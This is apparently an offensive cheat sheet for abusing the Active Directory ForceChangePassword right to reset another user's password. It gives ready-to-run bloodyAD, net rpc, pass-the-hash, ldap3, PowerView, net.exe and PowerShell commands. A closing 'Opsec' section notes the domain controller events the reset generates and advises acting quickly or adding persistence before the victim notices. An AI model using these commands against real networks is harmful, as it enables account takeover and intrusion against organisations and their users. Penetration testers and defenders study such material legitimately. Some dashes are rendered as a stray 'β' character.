ForceChangePassword
Source can reset target user's password without knowing the current password
Applies to: User/Group/Computer β User
Linux Abuse
bloodyAD
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'
impacket net rpc
net rpc password <target-user> '<new-password>' -U <domain>/<username>%'<password>' -S <dc-ip>
With hash (pass-the-hash)
bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> set password <target-user> '<new-password>'
Via LDAP (ldapmodify β requires knowing unicodePwd encoding)
python3 -c "
import ldap3, ssl
from ldap3 import Server, Connection, MODIFY_REPLACE
s = Server('<dc-ip>', use_ssl=True)
c = Connection(s, '<domain>\\\\<username>', '<password>', auto_bind=True)
new_pass = '\"<new-password>\"'.encode('utf-16-le')
c.modify('CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>',
{'unicodePwd': [(MODIFY_REPLACE, [new_pass])]})
print(c.result)
"
Windows Abuse
PowerView
$pass = ConvertTo-SecureString '<new-password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <target-user> -AccountPassword $pass -Credential $cred
CMD / net.exe
net user <target-user> <new-password> /domain
RPC (runas context)
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', (ConvertTo-SecureString '<password>' -AsPlainText -Force))
Invoke-Command -ComputerName <dc-ip> -Credential $cred -ScriptBlock {
Set-ADAccountPassword -Identity '<target-user>' -Reset -NewPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force)
}
Opsec
- Generates event 4723 (change attempt by account) and 4724 (reset by admin) on the DC
- The target user will notice their password changed on next login β use quickly or combine with a persistence mechanism